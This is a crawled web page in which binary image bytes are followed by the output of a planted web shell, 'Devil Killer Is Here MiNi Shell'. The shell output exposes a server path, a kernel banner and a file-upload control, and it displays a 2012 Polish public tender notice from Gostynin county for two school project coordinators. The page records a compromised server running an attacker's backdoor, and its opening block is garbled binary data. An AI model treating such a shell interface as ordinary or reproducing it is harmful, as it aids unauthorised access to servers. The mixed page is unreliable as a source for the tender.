JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120412/115996-N-2012.html

<p class="kh_header"><b>Gostynin: Pełnienie funkcji koordynatorów ds. nadzoru merytorycznego w szkołach: Gostynińskie Centrum Edukacyjne oraz Zespół Szkół im. Marii Skłodowskiej Curie w Gostyninie w ramach Projektu Przedsiębiorczy uczeń - program rozwojowy szkół zawodowych w Gostyninie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego nr projektu P O K L . 09.02.00-14-036/11</b><br>
<b>Numer ogłoszenia: 115996 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gostyniński , ul. Dmowskiego 13, 09-500 Gostynin, woj. mazowieckie, tel. 024 2357981, faks 024 2357985.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> gostynin.powiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji koordynatorów ds. nadzoru merytorycznego w szkołach: Gostynińskie Centrum Edukacyjne oraz Zespół Szkół im. Marii Skłodowskiej Curie w Gostyninie w ramach Projektu Przedsiębiorczy uczeń - program rozwojowy szkół zawodowych w Gostyninie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego nr projektu P O K L . 09.02.00-14-036/11.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór 2 koordynatorów ds. nadzoru merytorycznego w szkołach: Gostynińskie Centrum Edukacyjne oraz Zespół Szkół im. Marii Skłodowskiej - Curie w Gostyninie w ramach Projektu Przedsiębiorczy uczeń - program rozwojowy szkół zawodowych w Gostyninie współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego. Nr projektu POKL.09.02.00-14-036/11

3.1.	79.42.10.00-1 - Usługi zarządzania projektem inne niż w zakresie robót budowlanych.
3.2.	Usługa będzie realizowana w 2 szkołach ponadgimnazjalnych 
Część  1.Koordynator projektu w Gostynińskim Centrum Edukacyjnym ul. Polna 39, 09-500 Gostynin.
	Część  2.Koordynator projektu w Zespół Szkół im. Marii Skłodowskiej-Curie ul. Kowalska 5, 09-500 Gostynin.
Do obowiązków  koordynatorów należało będzie osobiste świadczenie usługi koordynacji w miejscu realizacji projektu polegające na:
1.	ustalenie harmonogramu realizacji zajęć w ramach projektu i sporządzanie zmian w tym zakresie,
2.	nadzór pod kątem organizacyjno - technicznym nad prawidłowym przebiegiem zajęć organizowanych w projekcie,
3.	nadzór na zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem,
4.	zatwierdzenie planów pracy dla poszczególnych zajęć,
5.	udostępnienie niezbędnego sprzętu i pomocy dydaktycznych do realizacji zajęć,
6.	przygotowanie i przekazanie do kierownika projektu danych do PEFS,
7.	współpraca z kierownikiem projektu w zakresie organizowania i monitorowania wszystkich form wsparcia realizowanych w ramach projektu,
8.	terminowe przekazywanie  dokumentacji do kierownika projektu,
9.	zapewnienie sprawnego przepływu informacji pomiędzy osobami zaangażowanymi w realizację projektu na terenie szkoły,
10.	współudział w promocji projektu,
11.	informowanie osób odpowiedzialnych za koordynację projektu o przeszkodach przy realizacji zadań związanych z projektem na terenie szkoły,
12.	gromadzenie dokumentacji projektu,
13.	stosowanie materiałów informacyjnych i wzorów dokumentów otrzymanych z biura projektu,
14.	umieszczanie logotypów EFS, POKL i symbolu UE na dokumentach i materiałach promocyjnych, edukacyjnych, informacyjnych związanych z realizacją powierzonych zadań zgodnie z zasadami określonymi w treści Wytycznych dotyczących oznaczania	projektów w ramach POKL,
15.	czuwanie nad prawidłowym oznakowaniem sal i pomieszczeń przeznaczonych na potrzeby realizacji projektu,
16.	podtrzymywanie uczestnictwa uczniów zrekrutowanych do udziału w projekcie,
17.	kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników,
18.	poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje	zewnętrzne w zakresie realizacji projektu,
19.	obecność podczas kontroli projektu,
20.	nadzorowanie postępów w realizacji projektu,
21.	nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu na terenie danego zespołu,
22.	monitorowanie, identyfikacja, analiza ryzyk, planowanie działań zaradczych, analiza i rozwiązywanie problemów związanych z realizacją projektu,
23.	przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U.
Nr 100, poz. 1024)
3.3	. Oprócz wszystkich zadań wymienionych w 3.2 do obowiązków koordynatorów w poszczególnych częściach należało będzie:
Część1. Realizacja zadania 1 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Gostynińskie Centrum Edukacyjne, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 1, współpraca przy realizacji zadania 1 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

Część 2. Realizacja zadania 2 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Zespół Szkół im. Marii Skłodowskiej- Curie, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 2, współpraca przy realizacji zadania 2 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

3.4.	Wykonawcy, przyjmujący obowiązki związane z koordynowaniem projektu będą zatrudnieni przez zamawiającego na podstawie umowy zlecenia. Wykonawców	obowiązuje	należyta staranność w wykonywaniu przedmiotu zamówienia.
3.5.	Koordynator projektu zobowiązany jest wykonywać przedmiot zamówienia w każdej części osobiście. Nie dopuszcza się podzlecania całości lub części zamówienia osobom trzecim. 
3.6.	Zamawiający dopuszcza możliwość pracy również w soboty lub inne dni wolne od zajęć dydaktycznych, jeżeli wówczas będą organizowane zajęcia w ramach projektu.
3.7.	Każdy Wykonawca, może złożyć ofertę na jedną, więcej lub wszystkie części będące przedmiotem zamówienia spełniając jednak warunek, że funkcję koordynatora w każdej części pełni inna osoba.
3.8.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi. 
3.9.	Wykonawca za wykonanie przedmiotu zamówienia w okresie obowiązywania umowy otrzyma wynagrodzenie zgodnie z zasadami określonymi w Umowie będącej załącznikiem Nr 5 do SIWZ.
3.10.	Wykonawca zobowiązuje się do przetwarzania danych osobowych, wyłącznie w zakresie i celu przewidzianym w umowie oraz zgodnie z przepisami ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r., Nr 101, poz. 926 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zasada spełnia /nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia spełnia ten warunek, jeśli wykaże się niezbędną wiedzą i udokumentowanym doświadczeniem:
wykształcenie wyższe I stopnia oraz  minimum 3 letni staż pracy na stanowiskach kierowniczych w zarządzaniu placówkami oświatowymi o profilu zawodowym. Do obowiązków koordynatorów będzie osobiste świadczenie usługi koordynacji w miejscu realizacji projektu.Ocena spełnienia powyższego warunku zostanie dokonana zgodnie z formułą spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń. - wykaz osób Załącznik Nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia spełnia ten warunek, jeśli wykaże się niezbędną wiedzą i udokumentowanym doświadczeniem:
wykształcenie wyższe I stopnia oraz  minimum 3 letni staż pracy na stanowiskach kierowniczych w zarządzaniu placówkami oświatowymi o profilu zawodowym.Do obowiązków koordynatorów będzie osobiste świadczenie usługi koordynacji w miejscu realizacji projektu.Ocena spełnienia powyższego warunku zostanie dokonana zgodnie z formułą spełnia/nie spełnia, na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń. - wykaz osób Załącznik Nr 4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust. 1 ustawy Prawo zamówień publicznych przewiduje możliwość dokonywania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:
Dopuszcza się zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie: -zmniejszenia wynagrodzenia z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy, -zmiany terminu realizacji przedmiotu umowy, wynikającej z wystąpienia obiektywne niezależnych od woli stron umowy okoliczności, -dostosowania umowy do zmian powszechnie obowiązujących przepisów prawa mających wpływ na realizację przedmiotu zamówienia, nie dotyczy wzrostu stawki podatku VAT (wzrost stawki podatku VAT nie wpływa na wysokość wynagrodzenia Wykonawcy. Koszty związane ze wzrostem stawki podatku VAT obciążają Wykonawcę, -wprowadzenia lub zmiany podwykonawcy, -przekształcenia lub zmiany siedziby którejkolwiek ze stron umowy, -zmiany osób reprezentujących strony


 oraz innych osób z nazwiska wymienionych w umowie. Powyższe okoliczności stanowią warunki zmiany umowy, o których mowa w art. 144 ust. 1 Pzp. Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności. Zmiana osób wyznaczonych do kontaktów przez Zamawiającego lub Wykonawcę, zmiana danych dotyczących numeru konta bankowego oraz danych teleadresowych Wykonawcy nie powodują konieczności sporządzenia aneksu do umowy. W takiej sytuacji, Wykonawca zobowiązany jest niezwłocznie, pisemnie poinformować Zamawiającego o zaistniałej zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gostynin.powiat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Gostyninie
ul.Dmowskiego 13
09-500 Gostynin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 10:00, miejsce: Starostwo Powiatowe w Gostyninie
ul.Dmowskiego 13, sekretariat
09-500 Gostynin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków EFS  w ramach POKL Działanie 9.2.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Koordynator projektu w Gostynińskim Centrum Edukacyjnym ul. Polna 39, 09-500 Gostynin..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków  koordynatorów należało będzie osobiste świadczenie usługi koordynacji w miejscu realizacji projektu polegające na: 	
1.	ustalenie harmonogramu realizacji zajęć w ramach projektu i sporządzanie zmian w tym zakresie,
2.	nadzór pod kątem organizacyjno - technicznym nad prawidłowym przebiegiem zajęć organizowanych w projekcie,
3.	nadzór na zgodnością prowadzonych działań z zapisami zawartymi we wniosku, w tym budżetem i harmonogramem,
4.	zatwierdzenie planów pracy dla poszczególnych zajęć,
5.	udostępnienie niezbędnego sprzętu i pomocy dydaktycznych do realizacji zajęć,
6.	przygotowanie i przekazanie do kierownika projektu danych do PEFS,
7.	współpraca z kierownikiem projektu w zakresie organizowania i monitorowania wszystkich form wsparcia realizowanych w ramach projektu,
8.	terminowe przekazywanie  dokumentacji do kierownika projektu,
9.	zapewnienie sprawnego przepływu informacji pomiędzy osobami zaangażowanymi w realizację projektu na terenie szkoły,
10.	współudział w promocji projektu,
11.	informowanie osób odpowiedzialnych za koordynację projektu o przeszkodach przy realizacji zadań związanych z projektem na terenie szkoły,
12.	gromadzenie dokumentacji projektu,
13.	stosowanie materiałów informacyjnych i wzorów dokumentów otrzymanych z biura projektu,
14.	umieszczanie logotypów EFS, POKL i symbolu UE na dokumentach i materiałach promocyjnych, edukacyjnych, informacyjnych związanych z realizacją powierzonych zadań zgodnie z zasadami określonymi w treści Wytycznych dotyczących oznaczania	projektów w ramach POKL,
15.	czuwanie nad prawidłowym oznakowaniem sal i pomieszczeń przeznaczonych na potrzeby realizacji projektu,
16.	podtrzymywanie uczestnictwa uczniów zrekrutowanych do udziału w projekcie,
17.	kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników,
18.	poddanie się kontroli prowadzonej przez organy wewnętrzne i instytucje	zewnętrzne w zakresie realizacji projektu,
19.	obecność podczas kontroli projektu,
20.	nadzorowanie postępów w realizacji projektu,
21.	nadzorowanie pracy wszystkich osób zaangażowanych w realizację projektu na terenie danego zespołu,
22.	monitorowanie, identyfikacja, analiza ryzyk, planowanie działań zaradczych, analiza i rozwiązywanie problemów związanych z realizacją projektu,
23.	przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych (Dz. U. z 2002r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U.
Nr 100, poz. 1024)
3.3	. Oprócz wszystkich zadań wymienionych w 3.2 do obowiązków koordynatorów w poszczególnych częściach należało będzie:
Część1. Realizacja zadania 1 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Gostynińskie Centrum Edukacyjne, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 1, współpraca przy realizacji zadania 1 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

Część 2. Realizacja zadania 2 poprzez koordynację realizacji wsparcia dodatkowego dla uczniów szkoły Zespół Szkół im. Marii Skłodowskiej- Curie, w tym koordynowanie zapewnienia sal na realizację zajęć, nadzór nad rekrutacją i ewaluacją projektu w części dot. zadania 2, współpraca przy realizacji zadania 2 z partnerami projektu: Zakładem Doskonalenia Zawodowego w Płocku i Izbą Gospodarcza Regionu Płockiego.

3.4.	Wykonawcy, przyjmujący obowiązki związane z koordynowaniem projektu będą zatrudnieni przez zamawiającego na podstawie umowy zlecenia. Wykonawców	obowiązuje	należyta staranność w wykonywaniu przedmiotu zamówienia.
